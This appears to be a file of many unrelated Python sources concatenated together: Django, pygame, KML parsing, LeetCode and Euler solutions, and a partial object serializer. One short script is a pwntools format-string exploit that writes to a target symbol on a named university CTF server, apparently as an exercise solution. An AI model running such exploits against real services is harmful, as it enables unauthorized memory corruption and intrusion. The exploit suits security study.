* migrated from abacus-att
git@github.ibm.com:abacus-implementation/abacus-att.git
:param some_analyses:
"""
BaseObject.__init__(self, __name__)
self.analyses = some_analyses
self.is_debug = is_debug
def get_max_confidence(self):
"""
:return: the maximum confidence among all analysis results
"""
max_confidence = 0
for analysis in self.analyses:
if analysis["confidence"] > max_confidence:
max_confidence = analysis["confidence"]
return max_confidence
def fit_curve(self):
"""
Purpose:
poor-mans sigmoid curve fitting
Example:
given four analysis results with these confidence levels
[115, 100, 80, 10]
normalize to
[100, 85, 65, 0]
note how the delta is computed from the highest result
delta = -15
and the delta is deducted from each result
:return: normalized confidence levels
"""
# determine the delta
max_confidence = self.get_max_confidence()
delta = 0
if max_confidence > 100:
delta = self.get_max_confidence() - 100
# deduct the delta from each analysis object
for analysis in self.analyses:
analysis["confidence"] -= delta
# no confidence level shall be lower than 0
if analysis["confidence"] < 0:
analysis["confidence"] = 0
def tie_break(self):
"""
Purpose:
for two equal flows,
gives a boost to the flows with the most "include-all-of" tags
:return:
"""
max_confidence = self.get_max_confidence()
for analysis in self.analyses:
if max_confidence != analysis["confidence"]:
continue
total_include_all_of = len(analysis["analysis"]["include_all_of"]["total"])
analysis["confidence"] += total_include_all_of * 5
def process(self):
self.tie_break()
self.fit_curve()
return self.analyses
|
# Generated by Django 3.1.4 on 2020-12-14 10:48
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('system', '0002_transaction_amount'),
]
operations = [
migrations.AddField(
model_name='transaction',
name='date',
field=models.DateTimeField(blank=True, default=datetime.datetime(2020, 12, 14, 11, 48, 47, 480330)),
),
]
|
from src import common, utils
from src.Engine.Reusable.button import Button
from src.Engine.Reusable.dropdowns import DropDown
from src.Engine.objects import game_data
from src.Engine.base import BaseSidebar
class DefaultSidebar(BaseSidebar):
def __init__(self, screen=common.SCREEN):
super().__init__(screen)
self.nodetype_select = DropDown((common.GRID_WIDTH + 10, 80), 150, 40, ["Test", "Worn Down Road"], (128, 128, 128),
"Road", 19, (0, 0, 0), (128, 128, 128), (140, 140, 140), (150, 150, 150),
(100, 100, 100), 5)
self.nodetype_select.bind_on_selection(game_data.game_state.on_nodetype_select_selection)
def handle_events(self, event):
self.nodetype_select.handle_event(event)
def draw(self):
self.nodetype_select.draw()
class NodeInfoSidebar(BaseSidebar):
def __init__(self, screen=common.SCREEN, *args, **kwargs):
super().__init__(screen)
if 'node_pos' in kwargs:
self.node_pos = kwargs['node_pos']
self.node = args[0]
self.exit_button = Button(
self.screen, (common.GRID_WIDTH + 10, common.GRID_HEIGHT - 50, 180, 40),
lambda: self.change_sidebar(DefaultSidebar),
(128, 128, 128), "Exit Properties", (0, 0, 0), 15, False, (100, 100, 100), 5,
(150, 150, 150), False
)
def handle_events(self, event):
self.exit_button.handle_event(event)
def draw(self):
title_txt = utils.load_font(15).render(f"Properties of Node {self.node_pos}:", True, (0, 0, 0))
self.screen.blit(
title_txt, (common.GRID_WIDTH + 10, 80)
)
traffic_txt = utils.load_font(20).render(
f"Traffic: {f'None' if self.node.properties['traffic'] is None else ''}",
True, (0, 0, 0)
)
self.screen.blit(
traffic_txt, (common.GRID_WIDTH + 10, 120)
)
type_txt = utils.load_font(20).render(
f"Node Type: {self.node.type.name.replace('_', ' ')}",
True, (0, 0, 0)
)
self.screen.blit(
type_txt, (common.GRID_WIDTH + 10, 150)
)
self.exit_button.draw()
|
def notas(*n, sit=False):
"""
-> Função para notas e situação de vário alunos.
:param n: notas dos alunos
:param sit: valor opcional, indincando de quer ou não mostrar a situação
:return: dicionário com várias informações da turma.
"""
d = {}
d['total'] = len(n)
d['maior'] = max(n)
d['menor'] = min(n)
d['media'] = sum(n)/len(n)
if sit:
if d['media'] >= 7:
d['situação'] = 'BOA'
if 5 <= d['media'] <7:
d['situação'] = 'RAZOÁVEL'
if d['media'] < 5:
d['situação'] = 'RUIM'
return d
resp = notas(3, 6, 10, 6.5, sit=True)
print(resp)
help(notas) |
# https://leetcode.com/problems/sum-of-digits-in-base-k/
class Solution:
def sumBase(self, n: int, k: int) -> int:
rem = n
value = ""
sumx = 0
while n > 0:
rem = n%k
value += str(rem)
n = n//k
for each in value:
sumx += int(each)
return sumx
|
#!/usr/bin/env python
from pwn import *
SERVER = "mustard.stt.rnl.tecnico.ulisboa.pt"
PORT = 10092
context.arch = "i386"
context.os = "linux"
e = ELF("bin")
SYM = e.symbols["target"]
PTR = p32(SYM)
POS = 7
s = remote(SERVER, PORT)
s.sendline(PTR + "%{}$n".format(POS))
print(s.recvuntil("}"))
s.close()
|
import pygame
import random
from mini_game_class import MiniGame
class Button:
def __init__(self, click_area, row, column):
self.click_area = click_area
self.row = row
self.column = column
def was_clicked(self, mouse_position):
return self.click_area.collidepoint(*mouse_position)
class Game(MiniGame):
def __init__(self, location):
super().__init__(location)
self.size = self.settings['size']
self.tile_size = 900 // self.size
self.tiles = self.load_tiles()
self.grid = self.create_grid()
self.shuffle_tiles(5)
self.buttons = None
def create_grid(self):
grid = []
coordinates = []
for row in range(self.size):
grid.append([])
for column in range(self.size):
grid[row].append(row * self.size + column)
coordinates.append((row, column))
grid[1][1] = None
return grid
def load_tiles(self):
image = pygame.image.load(f'{self.location.image_path}puzzle.png')
result = []
for row in range(self.size):
for column in range(self.size):
x = column * self.tile_size
y = row * self.tile_size
tile = image.subsurface([x, y, self.tile_size, self.tile_size])
result.append(tile)
return result
def get_empty_cell(self):
for row in range(self.size):
for column in range(self.size):
if self.grid[row][column] is None:
return row, column
def create_buttons(self):
buttons = []
row, column = self.get_empty_cell()
for row_offset, column_offset in [(1, 0), (-1, 0), (0, 1), (0, -1)]:
r = row + row_offset
c = column + column_offset
if r < 0 or c < 0 or r >= self.size or c >= self.size:
continue
buttons.append(Button(
pygame.Rect(c * self.tile_size, r * self.tile_size, self.tile_size, self.tile_size),
r,
c
))
return buttons
def draw(self):
self.canvas.fill('Black')
for row in range(self.size):
for column in range(self.size):
tile_number = self.grid[row][column]
if tile_number is None:
continue
tile = self.tiles[tile_number]
self.canvas.blit(tile, (column * self.tile_size, row * self.tile_size))
if not self.done:
self.buttons = self.create_buttons()
return self.canvas
def swap_tiles(self, row, column):
empty_row, empty_column = self.get_empty_cell()
self.grid[empty_row][empty_column] = self.grid[row][column]
self.grid[row][column] = None
def check_completion(self):
for row in range(self.size):
for column in range(self.size):
cell = self.grid[row][column]
if cell is not None and cell != row * self.size + column:
return
empty_row, empty_column = self.get_empty_cell()
self.grid[empty_row][empty_column] = empty_row * self.size + empty_column
self.game_completion()
def handle_mouse_event(self, mouse_event):
if mouse_event.type == pygame.MOUSEBUTTONUP:
mouse_position = self.location.mini_game_mouse_pos()
for button in self.buttons:
if button.was_clicked(mouse_position):
self.swap_tiles(button.row, button.column)
self.check_completion()
return
def swap_random(self):
empty_row, empty_column = self.get_empty_cell()
while True:
row_offset, column_offset= random.choice([(1, 0), (-1, 0), (0, 1), (0, -1)])
r = empty_row + row_offset
c = empty_column + column_offset
if r < 0 or c < 0 or r >= self.size or c >= self.size:
continue
self.swap_tiles(r, c)
break
def shuffle_tiles(self, times):
for _ in range(times):
self.swap_random()
|
# -*- coding:utf8 -*-
from pykml import parser
def showGeometry(geometry):
pts = geometry.strip("\t").strip("\n").strip("\t")
pts = pts.split(' ')
newPts = []
for pt in pts:
pt = pt.split(",")
if len(pt) == 3:
newPts.append(" ".join(pt[0:2]))
coords = ",".join(newPts)
if coords == None:
return None
return coords
# <Polygon>
# <altitudeMode>relativeToGround</altitudeMode>
# <outerBoundaryIs>
# <LinearRing>
# <coordinates>
# -50.17550771979931,-29.4754907335555,0 -50.1755081692913,-29.565491050911,0 -50.2655089152286,-29.5654907063369,0 -50.26550846507681,-29.4754903899313,0 -50.17550771979931,-29.4754907335555,0 -50.17550771979931,-29.4754907335555,0
# </coordinates>
# </LinearRing>
# </outerBoundaryIs>
# </Polygon>
def showPolygon(poly):
geom = showGeometry(str(poly.getchildren()[-1].getchildren()[-1].getchildren()[-1]))
if geom == None:
return geom
return "POLYGON(("+geom+"))"
# <LineString>
# <coordinates>
# -55.95887672133307,-30.27547919965932,0 -55.95937522386026,-30.27560741069645,0 -55.95985636281911,-30.27552481691735,0 -55.96038405557332,-30.27551124009514,0 -55.96090726939379,-30.27558169345586,0 -55.96142445128812,-30.27557154540634,0
# </coordinates>
# </LineString>
def showLineString(line):
geom = showGeometry(str(line.getchildren()[-1]))
if geom == None:
return geom
return "LineString("+geom+")"
# <Placemark>
# <name>UAR 1 - UAP1</name>
# <visibility>0</visibility>
# <open>1</open>
# <styleUrl>#m_ylw-pushpin1400</styleUrl>
# <Polygon>
# ...
# </Polygon>
# </Placemark>
def showPlaceMark(place):
polygon = name = None
for f in place.getchildren():
if f.tag.endswith("name"):
# print f
name = str(f.text.encode("utf-8")).strip("\n").strip()
# print name
if f.tag.endswith("MultiGeometry"):
children = []
for ff in f.getchildren():
if ff.tag.endswith("Polygon"):
children.append(showPolygon(ff))
if ff.tag.endswith("LineString"):
children.append(showLineString(ff))
if len(children) == 1:
polygon = children[0]
else:
typ = children[0][:children[0].find("(")].upper()
flag = True
for c in children:
if not c.upper().startswith(typ):
flag = False
break
if flag:
children = [c[c.find("("):] for c in children]
if typ == "POINT":
polygon = "MULTIPOINT("+",".join(children)+")"
if typ == "LINESTRING":
polygon = "MULTILINESTRING("+",".join(children)+")"
if typ == "POLYGON":
polygon = "MULTIPOLYGON("+",".join(children)+")"
else:
polygon = "GEOMETRYCOLLECTION("+",".join(children)+")"
if f.tag.endswith("Polygon"):
polygon = showPolygon(f)
if f.tag.endswith("LineString"):
polygon = showLineString(f)
if polygon != None:
print "INSERT INTO UnidadeGeografica (Nome,shape,Data_Criacao, idProjeto,idPesquisador) VALUES (\""+ name+ "\",", "GeomFromText(\"",polygon,"\")", ",","NOW()",",1,1);"
def expand(folder):
for f in folder.getchildren():
if f.tag.endswith("Folder") or f.tag.endswith("Document"):
# print f.name.text.encode("utf-8")
expand(f)
if f.tag.endswith("Placemark"):
showPlaceMark(f)
# else:
# print f.tag
kml = parser.parse("Grades_Parcelas_PPBIO26Ago2015.kml")
#kml = parser.parse("SISBIOTA_UAR_UAP_UAL_16122014.kml")
root = kml.getroot()[0].getchildren()[-1].getchildren()[-1]
expand(root)
|
from django.contrib import admin
from django.urls import path
from app import views
urlpatterns = [
path('admin/', admin.site.urls),
path('', views.home),
path('about/', views.about, name='about'),
path('contact/', views.contact, name='contact'),
path('dashboard/', views.dashboard, name='dashboard'),
path('signup/', views.user_signup, name='signup'),
path('login/', views.user_login, name='login'),
path('logout/', views.user_logout, name='logout'),
path('addpost/', views.add_post, name='addpost'),
path('updatepost/<int:id>/', views.update_post, name='updatepost'),
path('delete/<int:id>/', views.delete_post, name='deletepost'),
]
|
def run() -> int:
sum_of_squares = sum(x ** 2 for x in range(1, 101))
square_of_sums = sum(range(1, 101)) ** 2
return square_of_sums - sum_of_squares
if __name__ == '__main__':
print(f'Difference of the sum of the squares and square of the sums of the first 100 natural numbers: {run()}') |
'''serialize/deserialize almost any kind of python object'''
# TODO:
# memoryview -- not possible? .tolist or .tobytes will return the data, but i haven't found a way to get the object that it references
# bytearray -- use str() to get the data
# operator.methodcaller -- can be done by using an object with __getattr__ for the name, and grabbing the method's *args, **kwds for the default args. hopefully doing this doesn't influence state...
# TODO: add a decorator that can transform anything into an object that will pass an instance of self
# to serialization service
import sys
if sys.version_info.major < 3:
import builtins, types
else:
import builtins, types
__all__ = ['caller', 'pack', 'unpack', 'loads', 'dumps']
VERSION = '0.7'
## FIXME: none of these are enabled due to their hackiness, search for XXX
# attribute[ignore=list of fu type names] -- ignore serializing/deserializing these types
# attribute[globals=dict] -- use the provided dict as the globals for deserialized objects
# attribute[exclude=list of var names] -- ignore serializing/deserializing these specific names
# attribute[local=list of module names] -- use the local versions of these modules
# attribute[recurse={type name : [list of types]}] -- only recurse into these types from this type
# attribute[norecurse={type name : [list of types]}] -- don't recurse into these types from this type
########
class package:
'''
This class is responsible for exposing the interface used to marshal/unmarshal
an object. The reason for the class is to close around the internals of this
module hiding the functionality that is used for serialization. The only
interfaces that are exposed are the pack() and unpack() classmethods.
'''
@classmethod
def pack(cls, object, **attributes):
'''convert any python object into a packable format'''
st = cls.stash()
id = st.store(object, **attributes)
return VERSION, id, st.packed()
@classmethod
def unpack(cls, data, **attributes):
'''unpack data into a real python object'''
ver, id, data = data
if ver != VERSION:
raise AssertionError('fu.package.unpack : invalid version %s != %s'%(ver, VERSION))
st = cls.stash()
st.unpack(data)
return st.fetch(id, **attributes)
### stuff that's hidden within this namespace
class cache(object):
'''
This class is used to handle the registration of the different serializers
and deserializers for a python type/constant. The registration of the
different implementations is done via decorator at which point one can
use the .by*() classmethods to identify the handler for their type or
instance.
'''
class registration:
id, const, type = {}, {}, {}
@staticmethod
def hash(data):
agg = 5381
for item in iter(data):
agg = (((agg<<5) + agg) ^ ord(item)) & 0xffffffff
return agg
## registration of a cls into cache
@classmethod
def register(cls, definition):
id = cls.registration.hash(definition.__name__)
#id = definition.__name__
if id in cls.registration.id:
raise KeyError("Duplicate id %x in cache"% id)
cls.registration.id[id] = definition
definition.id = id
return definition
@classmethod
def register_type(cls, definition):
'''registers the definition with the specified builtin type'''
type = definition.getclass()
if type in cls.registration.type:
raise KeyError("Duplicate type %r in cache"% type)
definition = cls.register(definition)
cls.registration.type[type] = definition
return definition
@classmethod
def register_const(cls, definition):
const = definition.getclass()
if const in cls.registration.const:
raise KeyError("Duplicate constant %r in cache"% const)
definition = cls.register(definition)
cls.registration.const[const] = definition
return definition
## determining a registered cls from various types
@classmethod
def byid(cls, id):
'''search through globastate.id for a definition'''
return cls.registration.id[id]
@classmethod
def byclass(cls, type):
'''search through registration.type for a definition'''
return cls.registration.type[type]
@classmethod
def byconst(cls, const):
'''search through registration.const for a definition'''
result = cls.registration.const[const]
if result.getclass() is not const:
raise KeyError(const)
return result
@classmethod
def byinstance(cls, instance):
'''iterate through all registered definitions to determine which one can work for serialization/deserialization'''
global package, object_, module_
type, object, module = types.TypeType if sys.version_info.major < 3 else builtins.type, types.ObjectType if sys.version_info.major < 3 else builtins.object, types.ModuleType
t = type(instance)
# any constant
try:
return package.cache.byconst(instance)
except (KeyError, TypeError):
pass
# special types
if t is module and instance is not module:
# XXX: implement binary modules
if hasattr(instance, '__file__'):
if instance.__file__.endswith('.pyd'):
raise NotImplementedError('Binary modules are un-supported')
return module_
return module_local
# by type
try:
return package.cache.byclass(t)
except (KeyError, TypeError):
pass
# builtins for known-modules that can be copied from
if t == builtin_.getclass():
if instance.__module__ is None:
#return incomplete # XXX
raise KeyError(instance, 'Unable to determine module name from builtin method')
return builtin_
# catch-all object
if hasattr(instance, '__dict__') or hasattr(instance, '__slots__'): # is this an okay assumption?
return object_
# FIXME: if it follows the pickle protocol..
if hasattr(instance, '__getstate__'):
raise NotImplementedError('Pickle protocol for type %r is unimplemented'% instance)
pickle.loads(pickle.dumps(instance))
return incomplete
raise KeyError(instance)
class stash(builtins.object):
'''
This class is used to recursively serialize/deserialize an instance or
type. It is temporarily constructed and will use the cache to identify
how to serialize/deserialize the data that is passed to it. Once all
the references are processed, a tuple of the objects and constants are
then returned. This can then be re-packed into a bytestream which can
then be transported wherever the user needs it.
'''
def __init__(self):
# cache for .fetch
self.fetch_cache = {}
self.store_cache = builtins.set()
# caches for .store
self.cons_data = {}
self.inst_data = {}
@staticmethod
def clsbyid(item): return package.cache.byid(item)
@staticmethod
def clsbyinstance(item): return package.cache.byinstance(item)
# FIXME: should prolly implement __str__, __unicode__, and __repr__
def __repr__(self):
cons = [(k, (self.clsbyid(clsid).__name__, v)) for k, (clsid, v) in self.cons_data.items()]
inst = [(k, (self.clsbyid(clsid).__name__, v)) for k, (clsid, v) in self.inst_data.items()]
return "<class '%s'> %s"%(self.__class__.__name__, builtins.repr({key : item for key, item in cons}))
## serializing/deserializing entire state
def packed(self):
return self.cons_data, self.inst_data
def unpack(self, data):
cons, inst = data
self.cons_data.clear()
self.inst_data.clear()
self.cons_data.update(cons)
self.inst_data.update(inst)
return True
## packing/unpacking of id's
def pack_references(self, data, **attributes):
'''converts object data into reference id's'''
if data.__class__ is ().__class__:
return ().__class__(self.store(item, **attributes) for item in data)
elif data.__class__ is {}.__class__:
return {self.store(k, **attributes) : self.store(v, **attributes) for k, v in data.items()}
elif data.__class__ is [].__class__:
# a list contains multiple packed objects
return [self.pack_references(item, **attributes) for item in data]
return data
def unpack_references(self, data, **attributes):
'''converts packed references into objects'''
if data.__class__ is ().__class__:
return ().__class__(self.fetch(item, **attributes) for item in data)
elif data.__class__ is {}.__class__:
return {self.fetch(k, **attributes) : self.fetch(v, **attributes) for k, v in data.items()}
elif data.__class__ is [].__class__:
return [self.unpack_references(item, **attributes) for item in data]
return data
def identify(self, object):
return id(object)
# unique id generator for .identify if id is not guaranteed to be unique (python 2.6?)
#if not hasattr(self, '__identity'):
# self.__identity = []
#if object in self.__identity:
# return self.__identity.index(object)
#self.__identity.append(object)
#return self.identify(object)
def __getitem__(self, name):
return self.identify(name)
### stashing/fetching of objects
def store(self, object, **attributes):
identity = self.identify(object)
if identity in self.store_cache:
return identity
cls = self.clsbyinstance(object)
if False: # XXX: if we want to make the module and name part of the protocol. (for assistance with attributes)
# get naming info
modulename, name = getattr(object, '__module__', None), getattr(object, '__name__', None)
fullname = ('%s.%s'% (modulename, name)) if modulename else name
# attribute[ignore=list of types, exclude=list of names]
if (cls.__name__ in builtins.set(attributes.get('ignore', ()))) or \
(fullname in builtins.set(attributes.get('exclude', ()))):
cls = incomplete
# attribute[local=list of names]
if name in builtins.set(attributes.get('local', ())):
cls = module
# store constructor info
data = cls.p_constructor(object, **attributes)
self.store_cache.add(identity)
data = self.pack_references(data, **attributes)
self.cons_data[identity] = cls.id, data
# self.cons_data[identity] = cls.id, (modulename, name), data # XXX: for attributes by name
# recurse into instance data
data = cls.p_instance(object, **attributes)
data = self.pack_references(data, **attributes)
self.inst_data[identity] = cls.id, data
return identity
def fetch(self, identity, **attributes):
if identity in self.fetch_cache:
return self.fetch_cache[identity]
# unpack constructor
# _, (modulename, name), data = self.cons_data[identity] # XXX: for attributes by name
_, data = self.cons_data[identity]
cls, data = self.clsbyid(_), self.unpack_references(data, **attributes)
if False: # XXX: attributes
# naming info
fullname = ('%s.%s'% (modulename, name)) if modulename else name
# attribute[ignore=list of types, exclude=list of names]
if (cls.__name__ in builtins.set(attributes.get('ignore', ()))) or \
(fullname in builtins.set(attributes.get('exclude', ()))):
cls = incomplete
instance = incomplete.new()
self.fetch_cache[identity] = instance
return instance
# attribute[local=list of names]
if name in builtins.set(attributes.get('local', ())):
cls = module
# create an instance of packed object
instance = cls.u_constructor(data, **attributes)
self.fetch_cache[identity] = instance
# update instance with packed attributes
_, data = self.inst_data[identity]
cls, data = self.clsbyid(_), self.unpack_references(data, **attributes)
_ = cls.u_instance(instance, data, **attributes)
if instance is not _:
raise AssertionError('%s.fetch(%d) : constructed instance is different from updated instance'% (builtins.object.__repr__(self), identity))
return instance
class __type__(builtins.object):
'''
This base class is used to help register an instance of a type. Once
identifying the type of an instance, the class will be responsible for
returning any attributes that are necessary to re-construct or
re-instantiate that object.
'''
@classmethod
def getclass(cls, *args, **kwds):
'''
This returns the type to search for. The type is snuck from an instance
by using the __class__ attribute.
'''
raise NotImplementedError(cls)
@classmethod
def new(cls):
'''
This method returns an instance of the type that the class is supposed
to be responsible for.
'''
return cls.getclass()
@classmethod
def repr(cls, object):
'''
This method will output an instance in a readable manner.
'''
return repr(object)
@classmethod
def p_constructor(cls, object, **attributes):
'''
This method will extract any attributees that are required to create
the initial instance of a type. The necessary attributes are then
returned as a tuple.
'''
return ()
@classmethod
def p_instance(cls, object, **attributes):
'''
This method will extract any attributes that will be updated after
the type has been instantiated. It is prudent to note that these
attributes are not necessary to construct the object, only that the
object's users expect these fields to be set. The necessary attributes
are then returned as a tuple.
'''
raise NotImplementedError(cls)
@classmethod
def u_constructor(cls, data, **attributes):
'''
This method will take the tuple that is provided by the data parameter,
and use it to re-instantiate the specified type. The tuple in data is
the same as the tuple returned by the p_constructor() classmethod. The
method will return the properly instantiated type.
'''
raise NotImplementedError(cls)
@classmethod
def u_instance(cls, instance, data, **attributes):
'''
This method will take the tuple that is provided by the data parameter,
and do whatever is necessary to update the instance parameter with it.
This can include (but is not limited to), assigning any attributes with
the setattr() keyword, calling any methods to update the state, etc.
The tuple in data corresponds to the tuple returned by the p_instance()
classmethod. The method will then return the instance that was updated.
'''
return instance
@package.cache.register_type
class incomplete(__type__):
'''just a general type for incomplete objects'''
class partialinstance(object):
__name__ = '--incomplete--'
def __getattr__(self, attribute):
message = 'unable to access attribute "%s" from incomplete type "%s"'
raise Exception(message% (attribute, self.__name__))
def __call__(self, *args, **kwds):
message = 'unable to call incomplete type "%s"'
raise Exception(message% (self.__name__))
def __repr__(self):
return "%s %s"%( self.__class__, self.__name__ )
@classmethod
def getclass(cls):
return cls.partialinstance
@classmethod
def p_constructor(cls, object, **attributes):
return ()
@classmethod
def u_constructor(cls, data, **attributes):
return cls.new()
@classmethod
def p_instance(cls, object, **attributes):
return ()
### constants
if 'constants':
class __constant(__type__):
'''
This parent class is used to assist defining a constant. A constant
will typically not have any attributes or anything and in most cases
will only exist once in an interpreter. These are things like the
"object" type, or "float" type, etc.
'''
@classmethod
def new(cls, *args, **kwds):
'''
This method will create a new instance of the class returned by
the getclass() classmethod with the parameters provided as its
arguments.
'''
return cls.getclass()(*args, **kwds)
@classmethod
def p_instance(cls, object, **attributes):
'''
As the type is a constant, there are no attributes that are needed
to update the type. This method will simply return an empty tuple.
'''
return ()
@classmethod
def u_constructor(cls, data, **attributes):
'''
As the type is a constant, there are no parameters needed to
construct it. this method will simply return the type returned by
the getclass() classmethod.
'''
return cls.getclass()
@package.cache.register_const
class type(__constant):
@classmethod
def getclass(cls):
return builtins.type
@package.cache.register_const
class object(__constant):
@classmethod
def getclass(cls):
return builtins.object
@package.cache.register_const
class module(__constant):
@classmethod
def getclass(cls):
return builtins.__class__
@classmethod
def instancelocal(cls, modulename, **kwds):
# XXX: this might be broken when re-constructing package modules
# where relative imports are used.
return __import__(modulename)
@classmethod
def instance(cls, modulename, doc=None):
try:
return cls.instancelocal(modulename, doc=doc)
except ImportError:
pass
return cls.new(modulename, doc)
@package.cache.register_const
class bool(__constant):
@classmethod
def getclass(cls):
return builtins.bool
@package.cache.register_const
class int(__constant):
@classmethod
def getclass(cls):
return (0).__class__
@package.cache.register_const
class float(__constant):
@classmethod
def getclass(cls):
return 0.0.__class__
if sys.version_info.major < 3:
@package.cache.register_const
class long(__constant):
@classmethod
def getclass(cls):
return eval('0L').__class__
@package.cache.register_const
class complex(__constant):
@classmethod
def getclass(cls):
return 0j.__class__
@package.cache.register_const
class str(__constant):
@classmethod
def getclass(cls):
return ''.__class__
if sys.version_info.major < 3:
@package.cache.register_const
class unicode(__constant):
@classmethod
def getclass(cls):
return u''.__class__
@package.cache.register_const
class buffer(__constant):
@classmethod
def getclass(cls):
return builtins.buffer('').__class__
else:
@package.cache.register_const
class bytes(__constant):
@classmethod
def getclass(cls):
return b''.__class__
@package.cache.register_const
class tuple(__constant):
@classmethod
def getclass(cls):
return ().__class__
@package.cache.register_const
class list(__constant):
@classmethod
def getclass(cls):
return [].__class__
@package.cache.register_const
class dict(__constant):
@classmethod
def getclass(cls):
return {}.__class__
@package.cache.register_const
class set(__constant):
@classmethod
def getclass(cls):
return {item for item in []}.__class__
@package.cache.register_const
class frozenset(__constant):
@classmethod
def getclass(cls):
return builtins.frozenset
@package.cache.register_const
class instancemethod(__constant):
@classmethod
def getclass(cls):
return cls.getclass.__class__
@package.cache.register_const
class property(__constant):
@classmethod
def getclass(cls):
return builtins.property
@package.cache.register_const
class code(__constant):
@classmethod
def getclass(cls):
res = lambda: None
return res.func_code.__class__ if sys.version_info.major < 3 else res.__code__.__class__
if sys.version_info.major < 3:
@classmethod
def new(cls, argcount, nlocals, stacksize, flags, codestring, constants, names, varnames, filename='<memory>', name='<unnamed>', firstlineno=0, lnotab='', freevars=(), cellvars=()):
i, s, t, b = (0).__class__, ''.__class__, ().__class__, b''.__class__
optional = lambda x: lambda y: (y, ())[y is None] # FIXME: it'd be less stupid to not ignore the provided type in 'x'
types = [ i, i, i, i, b, t, t, t, s, s, i, b, optional(t), optional(t) ]
values = [ argcount, nlocals, stacksize, flags, codestring, constants, names, varnames, filename, name, firstlineno, lnotab, freevars, cellvars ]
for idx, cons in enumerate(types):
values[idx] = cons(values[idx])
return cls.getclass()(*values)
else:
@classmethod
def new(cls, argcount, posonlyargcount, kwonlyargcount, nlocals, stacksize, flags, codestring, constants, names, varnames, filename='<memory>', name='<unnamed>', firstlineno=0, lnotab='', freevars=(), cellvars=()):
i, s, t, b = (0).__class__, ''.__class__, ().__class__, b''.__class__
optional = lambda x: lambda y: (y, ())[y is None] # FIXME: it'd be less stupid to not ignore the provided type in 'x'
types = [ i, i, i, i, i, i, b, t, t, t, s, s, i, b, optional(t), optional(t) ]
values = [ argcount, posonlyargcount, kwonlyargcount, nlocals, stacksize, flags, codestring, constants, names, varnames, filename, name, firstlineno, lnotab, freevars, cellvars ]
for idx, cons in enumerate(types):
values[idx] = cons(values[idx])
return cls.getclass()(*values)
@package.cache.register_const
class function(__constant):
@classmethod
def getclass(cls):
return (lambda:0).__class__
@classmethod
def new(cls, code, globs, **attributes):
'''Create a new function'''
name = attributes.get('name', code.co_name)
argdefs = attributes.get('argdefs', ())
closure = attributes.get('closure', ())
c = cls.getclass()
return c(code, globs, name, argdefs, closure)
@package.cache.register_const
class builtin(__constant):
@classmethod
def getclass(cls):
return builtins.setattr.__class__
@package.cache.register_const
class generator(__constant):
@classmethod
def getclass(cls):
return (x for x in [0]).__class__
@package.cache.register_const
class frame(__constant):
@classmethod
def getclass(cls):
return (x for x in [0]).gi_frame.__class__
@package.cache.register_const
class Staticmethod(__constant):
@classmethod
def getclass(cls):
return builtins.staticmethod
@package.cache.register_const
class Classmethod(__constant):
@classmethod
def getclass(cls):
return builtins.classmethod
## real constant
@package.cache.register_const
class none(__constant):
@classmethod
def getclass(cls):
return None
@package.cache.register_const
class true(__constant):
@classmethod
def getclass(cls):
return True
@package.cache.register_const
class false(__constant):
@classmethod
def getclass(cls):
return False
@package.cache.register_const
class notImplemented(__constant):
@classmethod
def getclass(cls):
return builtins.NotImplemented
@package.cache.register_const
class ellipsis(__constant):
@classmethod
def getclass(cls):
return builtins.Ellipsis
if sys.version_info.major < 3:
@package.cache.register_const
class file(__constant):
@classmethod
def getclass(cls):
return builtins.file
import _weakref
@package.cache.register_const
class weakref(__constant):
@classmethod
def getclass(cls):
return _weakref.ReferenceType
@package.cache.register_const
class super(__constant):
@classmethod
def getclass(cls):
return builtins.super
import _thread
@package.cache.register_const
class threadlock(__constant):
@classmethod
def getclass(cls):
return _thread.LockType
if 'core':
@package.cache.register_type
class type_(__type__):
'''any generic python type'''
# FIXME: when instantiating the hierarchy of types, this fails to associate
# the method with the proper parent class. this is apparent if you
# compare the help() of the original object to the deserialized object
@classmethod
def getclass(cls):
return type.getclass()
@classmethod
def subclasses(cls, type):
'''return all subclasses of type'''
if not builtins.isinstance(type, builtins.type):
raise AssertionError('%s is not a valid python type'% builtins.type(type))
if type.__bases__ == ():
return ()
result = type.__bases__
for x in type.__bases__:
result += cls.subclasses(x)
return result
@classmethod
def p_constructor(cls, object, **attributes):
name, bases, slots = (object.__name__, object.__bases__, ().__class__(getattr(object, '__slots__')) if hasattr(object, '__slots__') else None)
result = [slots, name]
result.extend(bases)
return ().__class__(result)
@classmethod
def u_constructor(cls, data, **attributes):
result = [].__class__(data)
slots, name = result.pop(0), result.pop(0)
if slots is None:
return builtins.type(name, ().__class__(result), {})
return builtins.type(name, ().__class__(result), {'__slots__': slots})
@classmethod
def p_instance(cls, object, **attributes):
state = {key : value for key, value in getattr(object, '__dict__', {}).items()}
if hasattr(object, '__slots__'):
state.update((k, getattr(object, k)) for k in object.__slots__ if hasattr(object, k))
f = lambda: wat
t = builtins.type(f)
# non-serializeable descriptors
getset_descriptor = cls.__weakref__.__class__
method_descriptor = cls.__reduce_ex__.__class__
wrapper_descriptor = cls.__setattr__.__class__
member_descriptor = t.func_globals.__class__ if sys.version_info.major < 3 else t.__globals__.__class__
classmethod_descriptor = builtins.type(builtins.float.__dict__['fromhex'])
result = {}
for k, v in state.items():
if builtins.type(v) in {getset_descriptor, method_descriptor, wrapper_descriptor, member_descriptor, classmethod_descriptor, generator_.getclass()}:
continue
try:
_ = package.cache.byinstance(v)
except (KeyError, TypeError):
continue
result[k] = v
return result
@classmethod
def u_instance(cls, instance, data, **attributes):
for k, v in data.items():
try:
setattr(instance, k, v)
except (TypeError, AttributeError):
pass
return instance
if sys.version_info.major < 3:
@package.cache.register_type
class classobj(type_):
'''an old-style python class'''
@classmethod
def getclass(cls):
return builtins.type(package)
@package.cache.register_type
class Object(__constant):
@classmethod
def getclass(cls):
return builtins.object
@classmethod
def u_constructor(cls, data, **attributes):
return cls.new()
@package.cache.register
class object_(type_):
'''a generic python object and all it's parentclass' properties'''
@classmethod
def p_constructor(cls, object, **attributes):
name, type = getattr(object, '__name__', None), object.__class__
# FIXME: we should check for serialization methods here
# like getnewargs, getstate, reduce, etc.
return (name, type)
@classmethod
def u_constructor(cls, data, **attributes):
name, type = data
type.__name__ = name or ''
object = cls.getclass()
wrapper_descriptor, builtin_function_or_method = (item.__class__ for item in [object.__init__, object.__new__])
# FIXME: create the instance illegitimately
if type.__new__.__class__ is not builtin_function_or_method:
raise Exception('Unable to support custom-defined .__new__ operators')
# TODO: bniemczyk would like a hint here for customizing __new__
